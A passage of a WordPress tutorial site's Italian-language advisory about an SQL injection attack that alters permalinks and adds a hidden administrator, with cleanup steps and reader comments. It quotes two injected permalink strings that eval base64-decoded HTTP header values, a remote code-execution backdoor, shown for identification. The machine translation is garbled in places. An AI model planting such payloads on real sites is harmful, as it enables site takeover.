Trusted WordPress tutorials, when you need them most.
Beginner’s Guide to WordPress
Coppa WPB
25 Million+
Websites using our plugins
16+
Years of WordPress experience
3000+
WordPress tutorials
by experts

Iniezione SQL di WordPress – Ultimo attacco

Nota editoriale: guadagniamo una commissione dai link dei partner su WPBeginner. Le commissioni non influenzano le opinioni o le valutazioni dei nostri redattori. Per saperne di più su Processo editoriale.

Molti siti sono stati colpiti da un recente attacco SQL in cui vengono iniettati codici nel sito. Questa iniezione MySQL colpisce i permalink rendendoli inefficaci. Di conseguenza, gli URL degli articoli del blog non funzionano. Numerosi blog WordPress sono stati colpiti da questo attacco. Grazie a Andy Soward per averci segnalato questo problema.

Uno dei seguenti codici è stato aggiunto alla struttura dei permalink a causa di questo attacco:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Queste virgolette hanno aggiunto tutti i permalink del sito e possono essere modificate solo se rimosse manualmente.

Per correggere questo problema andare su:

Impostazioni > permalink e rimuovete il codice di cui sopra e sostituitelo con quello predefinito.

La prossima cosa da fare è andare su Utenti. Si vedrà che ci sono più amministratori. Non vedrete il loro nome elencato, ma vedrete che il conteggio è aumentato. È quindi necessario esaminare tutti gli utenti e trovare l’ultimo che si è registrato. Posizionare il mouse su quell’utente e ottenere il collega. Modificare il codice userid= aggiungendo 1 al numero. Quindi, se l’ultimo utente che si può vedere è stato l’utente numero 2, aggiungere 1 al codice e renderlo 3. Si dovrebbe scoprire che l’amministratore nascosto ha uno strano codice come nome. Eliminare il codice e renderlo un abbonato. Poi return ed elimina l’utente.

Questo dovrebbe correggere il problema. È anche possibile eliminare l’utente semplicemente andando nel proprio PHPMyAdmin. Perché lì si vedrà l’utente.

Volevamo solo diffondere questa notizia il prima possibile, in modo che i nostri utenti possano essere aggiornati. NON SI TRADUCE di controllare che il vostro blog non sia infetto. Ci auguriamo che WordPress presenti presto una versione.

Inoltre, se non avete ancora implementato alcune di queste misure per proteggere la vostra area amministrativa di WordPress.

Divulgazione: I nostri contenuti sono sostenuti dai lettori. Ciò significa che se cliccate su alcuni dei nostri link, potremmo guadagnare una commissione. Vedi come WPBeginner è finanziato , perché è importante e come puoi sostenerci. Ecco il nostro processo editoriale .

Avatar

Editorial Staff at WPBeginner is a team of WordPress experts led by Syed Balkhi with over 16 years of experience in WordPress, Web Hosting, eCommerce, SEO, and Marketing. Started in 2009, WPBeginner is now the largest free WordPress resource site in the industry and is often referred to as the Wikipedia for WordPress.

Il kit di strumenti WordPress definitivo

Ottenete l'accesso gratuito al nostro kit di strumenti - una raccolta di prodotti e risorse relative a WordPress che ogni professionista dovrebbe avere!

Reader Interactions

9 commentiLascia una risposta

  1. Syed Balkhi says

    Hey WPBeginner readers,
    Did you know you can win exciting prizes by commenting on WPBeginner?
    Every month, our top blog commenters will win HUGE rewards, including premium WordPress plugin licenses and cash prizes.
    You can get more details about the contest from here.
    Start sharing your thoughts below to stand a chance to win!

  2. ahmed_alaaedin says

    The database of my website has been injected few days ago, adding some strange characters and words after each post or page URL. I couldn’t find anything strange in the settings: permalinks or in the users menu. What to do to fix this problem, please? My hosting company has a backup of the infected database as well!

  3. a wordpress user says

    i was hit by this twice.

    first time it was wassup plugin sql injection, this time im not sure. my hosting provider has blocked me.

    once they restore my a/c i will remove wordpres.. I have had it!

    • Editorial Staff says

      We really appreciate this comment, the issue was not with the WP Super Cache, we believe it was the plugin called WP External Link. We uninstalled and reinstalled WP-Super Cache twice, but then we compared the development server where everything worked fine. The difference was this plugin. When we removed that plugin it worked. You may now read that post.

      Admin

      • lerrkin says

        Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Oh, I’m reading!
        Thanks a lot!

Lascia una risposta

Grazie per aver scelto di lasciare un commento. Tenga presente che tutti i commenti sono moderati in base alle nostre politica dei commenti e il suo indirizzo e-mail NON sarà pubblicato. Si prega di NON utilizzare parole chiave nel campo del nome. Avremo una conversazione personale e significativa.